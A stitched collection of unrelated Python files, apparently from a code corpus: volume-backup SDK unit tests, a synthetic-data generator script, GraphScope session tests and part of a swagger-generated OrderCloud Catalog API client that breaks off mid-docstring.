self.assertEqual("1d1139d8-8989-49d3-8aa1-83eb691e6db2", backup.id) self.assertEqual(1, backup.size) self.assertIsNone(backup.object_count) self.assertEqual("volumebackups", backup.container) self.assertIsNone(backup.name) self.assertEqual("2013-06-27T08:48:03.000000", backup.created_at) self.assertEqual("b23b579f08c84228b9b4673c46f0c442", backup.tenant_id) def test_get_backup(self): self.mock_response_json_file_values("get_backup.json") backup = self.proxy.get_backup("backup-id") self.session.get.assert_called_once_with( "backups/backup-id", endpoint_filter=self.service, endpoint_override=self.service.get_endpoint_override(), ) self.assertIsInstance(backup, _backup.Backup) self.assertEqual("error", backup.status) self.assertIsNone(backup.description) self.assertIsNone(backup.availability_zone) self.assertEqual("2748f2f2-4394-4e6e-af8d-8dd34496c024", backup.volume_id) self.assertEqual(("Connection to swift failed: " "[Errno 111] ECONNREFUSED"), backup.fail_reason) self.assertEqual("1d1139d8-8989-49d3-8aa1-83eb691e6db2", backup.id) self.assertEqual(1, backup.size) self.assertIsNone(backup.object_count) self.assertEqual("volumebackups", backup.container) self.assertIsNone(backup.name) self.assertEqual("2013-06-27T08:48:03.000000", backup.created_at) self.assertEqual("b23b579f08c84228b9b4673c46f0c442", backup.tenant_id) class TestBackupPolicy(TestVolumeBackupProxy): def __init__(self, *args, **kwargs): super(TestBackupPolicy, self).__init__(*args, **kwargs) def test_list_backup_policy(self): self.mock_response_json_file_values("list_backup_policies.json") policies = list(self.proxy.backup_policies()) self.assert_session_list_with("/backuppolicy", params={}) self.assertEqual(2, len(policies)) policy = policies[0] self.assertIsInstance(policy, _backup_policy.BackupPolicy) self.assertEqual("XX", policy.id) self.assertEqual("plan01", policy.name) self.assertEqual(0, policy.policy_resource_count) scheduled_policy = policy.scheduled_policy self.assertIsInstance(scheduled_policy, _backup_policy.SchedulePolicy) self.assertEqual(False, scheduled_policy.remain_first_backup_of_curMonth) self.assertEqual(10, scheduled_policy.rentention_num) self.assertEqual(1, scheduled_policy.frequency) self.assertEqual("12:00", scheduled_policy.start_time) 
self.assertEqual("ON", scheduled_policy.status) self.assertTrue(policies[1].scheduled_policy .remain_first_backup_of_curMonth) def test_create_backup_policy(self): self.mock_response_json_values({ "backup_policy_id": "af8a20b0-117d-4fc3-ae53-aa3968a4f870" }) scheduled_policy = { "remain_first_backup_of_curMonth": True, "rentention_num": 10, "frequency": 1, "start_time": "12:00", "status": "ON" } policy = self.proxy.create_backup_policy("backup_policy_name", **scheduled_policy) expect_post_json = { "backup_policy_name": "backup_policy_name", "scheduled_policy": { "remain_first_backup_of_curMonth": "Y", "rentention_num": 10, "frequency": 1, "start_time": "12:00", "status": "ON" } } self.assert_session_post_with("/backuppolicy", json=expect_post_json) self.assertEqual("af8a20b0-117d-4fc3-ae53-aa3968a4f870", policy.id) def test_update_backup_policy(self): self.mock_response_json_values({ "backup_policy_id": "af8a20b0-117d-4fc3-ae53-aa3968a4f870" }) attrs = self.get_file_content("update_policy.json") self.proxy.update_backup_policy("some-policy-id", **attrs) expected_json = { "backup_policy_name": "policy_01", "scheduled_policy": { "remain_first_backup_of_curMonth": "Y", "rentention_num": 10, "frequency": 1, "start_time": "12:00", "status": "ON" } } self.assert_session_put_with("backuppolicy/some-policy-id", json=expected_json) def test_delete_backup_policy_with_id(self): self.proxy.delete_backup_policy("some-config-id") self.assert_session_delete("backuppolicy/some-config-id") def test_link_resource_to_policy(self): self.mock_response_json_file_values("link_resources.json") policy = _backup_policy.BackupPolicy(id="policy-id") resources = ["volume-id-1", "volume-id-2"] linked_resources = self.proxy.link_resources_to_policy(policy, resources) self.assert_session_post_with("/backuppolicyresources", json={ "backup_policy_id": "policy-id", "resources": [{ "resource_id": "volume-id-1", "resource_type": "volume" }, { "resource_id": "volume-id-2", "resource_type": "volume" }] }) self.assertEqual(2, len(linked_resources)) success = linked_resources[0] self.assertEqual("bce8d47a-af17-4169-901f-4c7ae9f29c2c", success.resource_id) self.assertEqual("pod01.eu-de-01sa-brazil-1cn-north-1", success.os_vol_host_attr) self.assertEqual("eu-de-01sa-brazil-1cn-north-1", success.availability_zone) self.assertEqual("volume", success.resource_type) self.assertTrue(success.success) success = linked_resources[1] self.assertEqual("volume-id-2", success.resource_id) self.assertEqual("pod01.eu-de-01sa-brazil-1cn-north-1", success.os_vol_host_attr) self.assertEqual("eu-de-01sa-brazil-1cn-north-1", success.availability_zone) self.assertEqual("volume", success.resource_type) self.assertEqual("VBS.0002", success.code) self.assertEqual("xxxxx", success.message) self.assertFalse(success.success) def test_unlink_resource_of_policy(self): self.mock_response_json_file_values("unlink_resources.json") policy = _backup_policy.BackupPolicy(id="policy-id") resources = ["volume-id-1", "volume-id-2"] linked_resources = self.proxy.unlink_resources_of_policy(policy, resources) self.assert_session_post_with( "backuppolicyresources/policy-id/deleted_resources", json={ "resources": [{ "resource_id": "volume-id-1" }, { "resource_id": "volume-id-2" }] }) self.assertEqual(2, len(linked_resources)) success = linked_resources[0] self.assertEqual("bce8d47a-af17-4169-901f-4c7ae9f29c2c", success.resource_id) self.assertTrue(success.success) success = linked_resources[1] self.assertEqual("volume-id-2", success.resource_id) self.assertEqual("VBS.0002", 
success.code) self.assertEqual("xxxxx", success.message) self.assertFalse(success.success) def test_execute_policy(self): policy = _backup_policy.BackupPolicy(id="policy-id") self.proxy.execute_policy(policy) self.assert_session_post_with("backuppolicy/policy-id/action", json=None) def test_enable_policy(self): self.mock_response_json_file_values("update_policy.json") policy = _backup_policy.BackupPolicy(id="policy-id") self.proxy.enable_policy(policy) self.assert_session_put_with("backuppolicy/policy-id", json={ "scheduled_policy": { "status": "ON" } }) def test_disable_policy(self): self.mock_response_json_file_values("update_policy.json") policy = _backup_policy.BackupPolicy(id="policy-id") self.proxy.disable_policy(policy) self.assert_session_put_with("backuppolicy/policy-id", json={ "scheduled_policy": { "status": "OFF" } }) def test_list_task(self): query = { "sort_dir": "asc", "sort_key": "created_at", "status": "RUNNING", "id": "0781095c-b8ab-4ce5-99f3-4c5f6ff75319", "limit": 10, "offset": 10 } self.mock_response_json_file_values("list_tasks.json") tasks = list(self.proxy.tasks("policy-id", **query)) transferred_query = { "sort_dir": "asc", "sort_key": "created_at", "status": "RUNNING", "job_id": "0781095c-b8ab-4ce5-99f3-4c5f6ff75319", "limit": 10, "offset": 10 } self.assert_session_list_with("/backuppolicy/policy-id/backuptasks", params=transferred_query) self.assertEqual(2, len(tasks)) task = tasks[0] self.assertEqual("RUNNING", task.status) self.assertEqual("0781095c-b8ab-4ce5-99f3-4c5f6ff75319", task.id) self.assertEqual("2016-12-03T06:24:34.467", task.created_at) self.assertEqual("autobk_a61d", task.backup_name) self.assertEqual("f47a4ab5-11f5-4509-97f5-80ce0dd74e37", task.resource_id) self.assertEqual("volume", task.resource_type)
nilq/baby-python
python
import argparse

import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from scipy.stats import norm
from sklearn.datasets import make_regression

parser = argparse.ArgumentParser()
parser.add_argument(
    'RowCount',
    type=int,
    help='The number of rows to generate'
)
parser.add_argument(
    '--show-graph',
    help='Show a graph of the results, -x and -y must be given',
    action='store_true'
)
parser.add_argument(
    '-x',
    help='The x-axis of the graph',
    type=str,
    choices=['Age', 'Income', 'Height', 'Github_stars']
)
parser.add_argument(
    '-y',
    help='The y-axis of the graph',
    type=str,
    choices=['Age', 'Income', 'Height', 'Github_stars']
)
parser.add_argument(
    '-f', '--file',
    help='Save the data to a file',
    type=str
)
args = parser.parse_args()


def pick_profession(age, income, github_stars, height):
    if age > 50 and income > 20000:
        return 'president'
    if height > 190 and income > 5000:
        return 'basketball player'
    if github_stars > 30:
        if income > 20000:
            return 'software architect'
        else:
            return 'programmer'
    if age % 2 == 0 and github_stars % 3 == 1:
        return 'reality tv star'
    if age < 20:
        return 'student'
    if income < 1000:
        if height > 180:
            return 'soldier'
        return 'unemployed'
    if income < 5000 and height > 180:
        return 'officer'
    if height > 180:
        return 'general'
    return 'car salesman'


row_count = args.RowCount

# Derive correlated Age/Income columns from a synthetic regression problem.
age, income = make_regression(row_count, 1, 1, noise=3.3, random_state=42)
age = age.reshape((row_count,))
age = np.log(age * age + 1) * 17 + 20
age = np.floor(age)
income = income * income * 6 + 500

github_stars = -0.169 * age * age + 10 * age + income / 750 - 130
github_stars = np.floor(github_stars)

height = norm.rvs(size=row_count, loc=180, scale=10, random_state=42)

xs = -github_stars * height / 10 + age**2 / 2
is_client = (norm.rvs(size=row_count, loc=-100, scale=100) + xs) > 0

profession = [
    pick_profession(age[i], income[i], github_stars[i], height[i])
    for i in range(0, row_count)
]

df = pd.DataFrame(
    {
        'Age': age,
        'Income': income,
        'Github_stars': github_stars,
        'Height': height,
        'Profession': profession,
        'Is_client': is_client,
    }
)

print('Max age {0}, min age: {1}'.format(age.max(), age.min()))
print('Max income {0}, min income: {1}'.format(income.max(), income.min()))
print('Max stars {0}, min stars: {1}'.format(github_stars.max(),
                                             github_stars.min()))
print('Max height {0}, min height: {1}'.format(height.max(), height.min()))
print('Profession counts')
print(df.Profession.value_counts())
print('Client counts')
print(df.Is_client.value_counts())
print(df[0:20])

if args.show_graph:
    plt.plot(df[args.x], df[args.y], 'o')
    plt.show()

if args.file is not None:
    df.to_csv(args.file)
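
# Example invocation (the script file name is hypothetical), consistent with
# the argparse definition above:
#
#   python generate_data.py 1000 --show-graph -x Age -y Income -f people.csv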
nilq/baby-python
python
""" >>> def fn(arg1,arg2): pass >>> co = fn.func_code >>> co.co_argcount 2 >>> co.co_varnames ('arg1', 'arg2') """ def _test(): import doctest doctest.testmod() if __name__ == "__main__": _test()
nilq/baby-python
python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import json
import os
import tempfile

import pytest

import graphscope

COORDINATOR_HOME = os.path.join(os.path.dirname(__file__), "../", "../coordinator")

new_data_dir = os.path.expandvars("${GS_TEST_DIR}/new_property/v2_e2")


def setUpModule():
    graphscope.set_option(show_log=True)
    graphscope.set_option(initializing_interactive_engine=False)


@pytest.fixture
def invalid_config_file():
    with tempfile.TemporaryDirectory() as dir_name:
        json_path = os.path.join(dir_name, "test.json")
        with open(json_path, "w") as f:
            # json format is incorrect.
            f.write('{"xxx": ["xxx"],"xxx": 9527 "num_workers": 4}')
        yield json_path


@pytest.fixture
def local_config_file():
    conf = {"num_workers": 4}
    with tempfile.TemporaryDirectory() as dir_name:
        json_path = os.path.join(dir_name, "test.json")
        with open(json_path, "w") as f:
            json.dump(conf, f)
        yield json_path


# load property graph to specified session
def load_graph(session):
    g = session.load_from(
        edges={
            "e0": [
                (
                    "{}/twitter_e_0_0_0#header_row=true".format(new_data_dir),
                    ["weight"],
                    ("src", "v0"),
                    ("dst", "v0"),
                ),
                (
                    "{}/twitter_e_0_1_0#header_row=true".format(new_data_dir),
                    ["weight"],
                    ("src", "v0"),
                    ("dst", "v1"),
                ),
                (
                    "{}/twitter_e_1_0_0#header_row=true".format(new_data_dir),
                    ["weight"],
                    ("src", "v1"),
                    ("dst", "v0"),
                ),
                (
                    "{}/twitter_e_1_1_0#header_row=true".format(new_data_dir),
                    ["weight"],
                    ("src", "v1"),
                    ("dst", "v1"),
                ),
            ],
            "e1": [
                (
                    "{}/twitter_e_0_0_1#header_row=true".format(new_data_dir),
                    ["weight"],
                    ("src", "v0"),
                    ("dst", "v0"),
                ),
                (
                    "{}/twitter_e_0_1_1#header_row=true".format(new_data_dir),
                    ["weight"],
                    ("src", "v0"),
                    ("dst", "v1"),
                ),
                (
                    "{}/twitter_e_1_0_1#header_row=true".format(new_data_dir),
                    ["weight"],
                    ("src", "v1"),
                    ("dst", "v0"),
                ),
                (
                    "{}/twitter_e_1_1_1#header_row=true".format(new_data_dir),
                    ["weight"],
                    ("src", "v1"),
                    ("dst", "v1"),
                ),
            ],
        },
        vertices={
            "v0": "{}/twitter_v_0#header_row=true".format(new_data_dir),
            "v1": "{}/twitter_v_1#header_row=true".format(new_data_dir),
        },
        generate_eid=False,
    )
    return g


def test_default_session():
    default_sess = graphscope.get_default_session()
    assert default_sess.info["status"] == "active"

    default_sess.close()
    assert default_sess.info["status"] == "closed"


def test_launch_cluster_on_local(local_config_file):
    s = graphscope.session(cluster_type="hosts", config=local_config_file)
    info = s.info
    assert info["status"] == "active"
    s.close()


@pytest.mark.skipif("FULL-TEST-SUITE" not in os.environ, reason="Run in nightly CI")
def test_launch_session_from_config(local_config_file):
    saved = os.environ.get("GS_CONFIG_PATH", "")
    try:
        os.environ["GS_CONFIG_PATH"] = local_config_file
        s = graphscope.session(cluster_type="hosts")
        info = s.info
        assert info["status"] == "active"
        s.close()
    finally:
        os.environ["GS_CONFIG_PATH"] = saved


@pytest.mark.skipif("FULL-TEST-SUITE" not in os.environ, reason="Run in nightly CI")
def test_launch_session_from_dict():
    conf_dict = {"num_workers": 4}
    s = graphscope.session(cluster_type="hosts", config=conf_dict)
    info = s.info
    assert info["status"] == "active"
    s.close()


@pytest.mark.skipif("FULL-TEST-SUITE" not in os.environ, reason="Run in nightly CI")
def test_config_dict_has_highest_priority(local_config_file):
    s = graphscope.session(
        cluster_type="hosts", config=local_config_file, num_workers=2
    )
    info = s.info
    assert info["status"] == "active"
    s.close()


def test_error_on_config_file_not_exist():
    with pytest.raises(FileNotFoundError, match="No such file or directory"):
        graphscope.session(cluster_type="hosts", config="~/non_existing_filename.txt")


def test_error_on_invalid_config_file(invalid_config_file):
    # invalid config file (example json format incorrect)
    with pytest.raises(json.decoder.JSONDecodeError):
        graphscope.session(cluster_type="hosts", config=invalid_config_file)


def test_correct_closing_on_hosts():
    s1 = graphscope.session(cluster_type="hosts")
    s1.close()
    # check, launched coordinator and graphscope-engines on local are correctly closed.
    # test close twice
    s1.close()


@pytest.mark.skipif("FULL-TEST-SUITE" not in os.environ, reason="Run in nightly CI")
def test_border_cases():
    s1 = graphscope.session(cluster_type="hosts")
    s2 = graphscope.session(cluster_type="hosts")
    s3 = graphscope.session(cluster_type="hosts")

    s1.as_default()
    assert graphscope.get_default_session() == s1

    g3 = load_graph(s3)

    with pytest.raises(
        ValueError,
        match="A default session is already active. You must explicitly call Session.close().",
    ):
        s2.as_default()

    s1.close()

    s2.as_default()
    assert graphscope.get_default_session() == s2
    s2.close()

    s3.as_default()
    assert graphscope.get_default_session() == s3
    sssp = graphscope.property_sssp(g3, src=4)  # ok, g3 belongs to s3
    s3.close()


def test_with():
    with graphscope.session(cluster_type="hosts") as sess:
        assert graphscope.get_default_session() == sess

    sess = graphscope.session(cluster_type="hosts")
    with sess:
        pass
    assert sess.info["status"] == "closed"
nilq/baby-python
python
# coding: utf-8

"""
    OrderCloud

    No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)

    OpenAPI spec version: 1.0
    Contact: ordercloud@four51.com
    Generated by: https://github.com/swagger-api/swagger-codegen.git

    Licensed under the Apache License, Version 2.0 (the "License");
    you may not use this file except in compliance with the License.
    You may obtain a copy of the License at

        http://www.apache.org/licenses/LICENSE-2.0

    Unless required by applicable law or agreed to in writing, software
    distributed under the License is distributed on an "AS IS" BASIS,
    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
    See the License for the specific language governing permissions and
    limitations under the License.
"""

from __future__ import absolute_import

import sys
import os
import re

# python 2 and python 3 compatibility library
from six import iteritems

from ..configuration import Configuration
from ..api_client import ApiClient


class CatalogApi(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen
    """

    def __init__(self, api_client=None):
        config = Configuration()
        if api_client:
            self.api_client = api_client
        else:
            if not config.api_client:
                config.api_client = ApiClient()
            self.api_client = config.api_client

    def create(self, catalog, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.create(catalog, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param Catalog catalog: (required)
        :return: Catalog
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.create_with_http_info(catalog, **kwargs)
        else:
            (data) = self.create_with_http_info(catalog, **kwargs)
            return data

    def create_with_http_info(self, catalog, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.create_with_http_info(catalog, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param Catalog catalog: (required)
        :return: Catalog
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['catalog']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method create" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'catalog' is set
        if ('catalog' not in params) or (params['catalog'] is None):
            raise ValueError("Missing the required parameter `catalog` when calling `create`")

        resource_path = '/catalogs'.replace('{format}', 'json')
        path_params = {}

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'catalog' in params:
            body_params = params['catalog']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json', 'text/plain; charset=utf-8'])

        # Authentication setting
        auth_settings = ['oauth2']

        return self.api_client.call_api(resource_path, 'POST',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='Catalog',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def delete(self, catalog_id, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete(catalog_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str catalog_id: ID of the catalog. (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.delete_with_http_info(catalog_id, **kwargs)
        else:
            (data) = self.delete_with_http_info(catalog_id, **kwargs)
            return data

    def delete_with_http_info(self, catalog_id, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_with_http_info(catalog_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str catalog_id: ID of the catalog. (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['catalog_id']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'catalog_id' is set
        if ('catalog_id' not in params) or (params['catalog_id'] is None):
            raise ValueError("Missing the required parameter `catalog_id` when calling `delete`")

        resource_path = '/catalogs/{catalogID}'.replace('{format}', 'json')
        path_params = {}
        if 'catalog_id' in params:
            path_params['catalogID'] = params['catalog_id']

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json', 'text/plain; charset=utf-8'])

        # Authentication setting
        auth_settings = ['oauth2']

        return self.api_client.call_api(resource_path, 'DELETE',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type=None,
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def delete_assignment(self, catalog_id, buyer_id, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_assignment(catalog_id, buyer_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str catalog_id: ID of the catalog. (required)
        :param str buyer_id: ID of the buyer. (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.delete_assignment_with_http_info(catalog_id, buyer_id, **kwargs)
        else:
            (data) = self.delete_assignment_with_http_info(catalog_id, buyer_id, **kwargs)
            return data

    def delete_assignment_with_http_info(self, catalog_id, buyer_id, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_assignment_with_http_info(catalog_id, buyer_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str catalog_id: ID of the catalog. (required)
        :param str buyer_id: ID of the buyer. (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['catalog_id', 'buyer_id']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_assignment" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'catalog_id' is set
        if ('catalog_id' not in params) or (params['catalog_id'] is None):
            raise ValueError("Missing the required parameter `catalog_id` when calling `delete_assignment`")
        # verify the required parameter 'buyer_id' is set
        if ('buyer_id' not in params) or (params['buyer_id'] is None):
            raise ValueError("Missing the required parameter `buyer_id` when calling `delete_assignment`")

        resource_path = '/catalogs/{catalogID}/assignments'.replace('{format}', 'json')
        path_params = {}
        if 'catalog_id' in params:
            path_params['catalogID'] = params['catalog_id']

        query_params = {}
        if 'buyer_id' in params:
            query_params['buyerID'] = params['buyer_id']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json', 'text/plain; charset=utf-8'])

        # Authentication setting
        auth_settings = ['oauth2']

        return self.api_client.call_api(resource_path, 'DELETE',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type=None,
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def delete_product_assignment(self, catalog_id, product_id, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_product_assignment(catalog_id, product_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str catalog_id: ID of the catalog. (required)
        :param str product_id: ID of the product. (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.delete_product_assignment_with_http_info(catalog_id, product_id, **kwargs)
        else:
            (data) = self.delete_product_assignment_with_http_info(catalog_id, product_id, **kwargs)
            return data

    def delete_product_assignment_with_http_info(self, catalog_id, product_id, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_product_assignment_with_http_info(catalog_id, product_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str catalog_id: ID of the catalog. (required)
        :param str product_id: ID of the product. (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['catalog_id', 'product_id']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_product_assignment" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'catalog_id' is set
        if ('catalog_id' not in params) or (params['catalog_id'] is None):
            raise ValueError("Missing the required parameter `catalog_id` when calling `delete_product_assignment`")
        # verify the required parameter 'product_id' is set
        if ('product_id' not in params) or (params['product_id'] is None):
            raise ValueError("Missing the required parameter `product_id` when calling `delete_product_assignment`")

        resource_path = '/catalogs/{catalogID}/productassignments/{productID}'.replace('{format}', 'json')
        path_params = {}
        if 'catalog_id' in params:
            path_params['catalogID'] = params['catalog_id']
        if 'product_id' in params:
            path_params['productID'] = params['product_id']

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json', 'text/plain; charset=utf-8'])

        # Authentication setting
        auth_settings = ['oauth2']

        return self.api_client.call_api(resource_path, 'DELETE',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type=None,
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def get(self, catalog_id, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get(catalog_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str catalog_id: ID of the catalog. (required)
        :return: Catalog
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.get_with_http_info(catalog_id, **kwargs)
        else:
            (data) = self.get_with_http_info(catalog_id, **kwargs)
            return data

    def get_with_http_info(self, catalog_id, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_with_http_info(catalog_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str catalog_id: ID of the catalog. (required)
        :return: Catalog
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['catalog_id']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'catalog_id' is set
        if ('catalog_id' not in params) or (params['catalog_id'] is None):
            raise ValueError("Missing the required parameter `catalog_id` when calling `get`")

        resource_path = '/catalogs/{catalogID}'.replace('{format}', 'json')
        path_params = {}
        if 'catalog_id' in params:
            path_params['catalogID'] = params['catalog_id']

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json', 'text/plain; charset=utf-8'])

        # Authentication setting
        auth_settings = ['oauth2']

        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='Catalog',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def list(self, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.list(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str search: Word or phrase to search for.
        :param str search_on: Comma-delimited list of fields to search on.
        :param str sort_by: Comma-delimited list of fields to sort by.
        :param int page: Page of results to return. Default: 1
        :param int page_size: Number of results to return per page. Default: 20, max: 100.
        :param dict(str, str) filters: Any additional key/value pairs passed in the query string are interpreted as filters. Valid keys are top-level properties of the returned model or 'xp.???'
        :return: ListCatalog
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.list_with_http_info(**kwargs)
        else:
            (data) = self.list_with_http_info(**kwargs)
            return data

    def list_with_http_info(self, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
